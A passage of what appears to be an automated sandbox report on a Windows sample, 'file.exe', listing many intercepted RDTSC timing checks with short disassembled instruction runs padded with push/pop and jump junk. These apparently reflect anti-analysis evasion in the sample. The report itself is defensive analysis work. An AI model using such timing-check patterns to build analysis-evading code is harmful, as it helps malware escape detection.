0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D2045h], eax 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 cld 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D3525h], ebx 0x0000007c nop 0x0000007d push ecx 0x0000007e jmp 00007F8934532D15h 0x00000083 pop ecx 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 push edx 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A524 second address: B9A562 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F893453D395h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jnp 00007F893453D388h 0x00000014 mov ch, 64h 0x00000016 push 00000000h 0x00000018 xor esi, dword ptr [ebp+122D2854h] 0x0000001e clc 0x0000001f push D1814EECh 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007F893453D388h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A562 second address: B9A5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2E7EB194h 0x00000010 mov dword ptr [ebp+122D37DEh], eax 0x00000016 push 00000003h 0x00000018 or esi, 6FF2C100h 0x0000001e push 00000000h 0x00000020 sbb edx, 0CAD763Eh 0x00000026 push 00000003h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F8934532D08h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov edi, edx 0x00000044 push 91342199h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A685 second address: B9A689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A689 second address: B9A6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a adc cx, D4ACh 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2BF4h], edi 0x00000017 push 29CACF5Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jc 00007F8934532D06h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A6B1 second address: B9A768 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F893453D399h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 29CACFDEh 0x00000012 sub dword ptr [ebp+122D2B9Ah], edi 0x00000018 push 00000003h 0x0000001a sub dword ptr [ebp+122D1A93h], esi 0x00000020 push 00000000h 0x00000022 jo 00007F893453D386h 0x00000028 push 00000003h 0x0000002a call 00007F893453D389h 0x0000002f push ebx 0x00000030 jnc 00007F893453D388h 0x00000036 pushad 0x00000037 popad 0x00000038 pop ebx 0x00000039 push eax 0x0000003a jbe 00007F893453D3A4h 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 jmp 00007F893453D392h 0x00000049 mov eax, dword ptr [eax] 0x0000004b push edx 0x0000004c jmp 00007F893453D38Bh 0x00000051 pop edx 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F893453D396h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A768 second address: B9A76D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A76D second address: B9A7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jmp 00007F893453D391h 0x0000000d lea ebx, dword ptr [ebp+1244E3A8h] 0x00000013 cld 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F893453D398h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A7A8 second address: B9A7CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8934532D0Eh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jc 00007F8934532D06h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A7CA second address: B9A7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A959 second address: B9A962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A962 second address: B9A9EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c jp 00007F893453D38Ch 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F893453D390h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop eax 0x00000025 jl 00007F893453D38Fh 0x0000002b pushad 0x0000002c add bx, EE47h 0x00000031 mov al, B5h 0x00000033 popad 0x00000034 lea ebx, dword ptr [ebp+1244E3B3h] 0x0000003a mov esi, ebx 0x0000003c jne 00007F893453D39Ah 0x00000042 xchg eax, ebx 0x00000043 jne 00007F893453D39Ah 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jo 00007F893453D38Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B9A9EF second address: B9A9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8AD03 second address: B8AD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D395h 0x00000009 pop ebx 0x0000000a jc 00007F893453D3A1h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F893453D399h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8AD3E second address: B8AD43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8AD43 second address: B8AD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F893453D386h 0x0000000a jnp 00007F893453D386h 0x00000010 jmp 00007F893453D38Ch 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F893453D386h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8AD6D second address: B8AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB9A95 second address: BB9AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F893453D394h 0x0000000e jnp 00007F893453D386h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB9C26 second address: BB9C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB9F31 second address: BB9F53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D398h 0x00000007 jc 00007F893453D386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB9F53 second address: BB9F5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8934532D06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BB9F5D second address: BB9F61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA4D8 second address: BBA508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jng 00007F8934532D06h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F8934532D06h 0x00000017 jmp 00007F8934532D19h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA643 second address: BBA647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA647 second address: BBA64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA64D second address: BBA652 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA911 second address: BBA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA917 second address: BBA91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA91B second address: BBA923 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA923 second address: BBA93A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBA93A second address: BBA93E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBAA9F second address: BBAAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBAAA3 second address: BBAAA9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBAAA9 second address: BBAAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBABFD second address: BBAC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8934532D06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B877D5 second address: B877D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B877D9 second address: B877E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8934532D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B877E8 second address: B877EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBFD8C second address: BBFD91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC02BB second address: BC02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC02BF second address: BC02C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC02C5 second address: BC02CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBEB57 second address: BBEB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BBEB5B second address: BBEB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC03D0 second address: BC03D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC0555 second address: BC055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC055A second address: BC055F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6030 second address: BC6038 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6038 second address: BC603D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC603D second address: BC6045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6045 second address: BC6063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F8934532D0Eh 0x0000000d jc 00007F8934532D12h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6063 second address: BC6069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC648F second address: BC64AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D12h 0x00000007 jo 00007F8934532D0Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC65E9 second address: BC65F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F893453D386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC65F3 second address: BC6617 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8934532D06h 0x00000008 jmp 00007F8934532D16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6617 second address: BC662E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D393h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC662E second address: BC6634 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC6634 second address: BC663A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC663A second address: BC666B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8934532D0Eh 0x00000008 js 00007F8934532D06h 0x0000000e jmp 00007F8934532D0Bh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F8934532D06h 0x0000001c jne 00007F8934532D06h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC85F4 second address: BC85FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC85FA second address: BC85FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC85FE second address: BC8604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B89244 second address: B89248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B89248 second address: B8924E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8924E second address: B89254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B89254 second address: B8925E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F893453D38Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B8925E second address: B8926D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9252 second address: BC9258 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9258 second address: BC9284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007F8934532D06h 0x00000013 jo 00007F8934532D06h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9413 second address: BC9438 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F893453D39Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F893453D386h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99E6 second address: BC99EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC99EB second address: BC9A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D392h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9A0B second address: BC9A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BC9A11 second address: BC9A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9B83 second address: BC9B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9C77 second address: BC9C9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F893453D386h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 jmp 00007F893453D394h 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9F98 second address: BC9F9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9F9C second address: BC9FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9FA2 second address: BC9FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA0B0 second address: BCA0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA0B4 second address: BCA0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA154 second address: BCA17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, ecx 0x0000000b xchg eax, ebx 0x0000000c jnl 00007F893453D38Ah 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F893453D38Fh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAFEF second address: BCAFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCAFF4 second address: BCB017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB017 second address: BCB01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB01C second address: BCB022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB022 second address: BCB026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB026 second address: BCB05A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b movsx edi, si 0x0000000e push 00000000h 0x00000010 or dword ptr [ebp+122D2BA8h], ecx 0x00000016 jmp 00007F893453D397h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB05A second address: BCB05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB05E second address: BCB064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCB064 second address: BCB07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8934532D0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC070 second address: BCC075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC075 second address: BCC0AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1885h], ecx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+12471EB1h], ebx 0x0000001c push eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f jl 00007F8934532D06h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
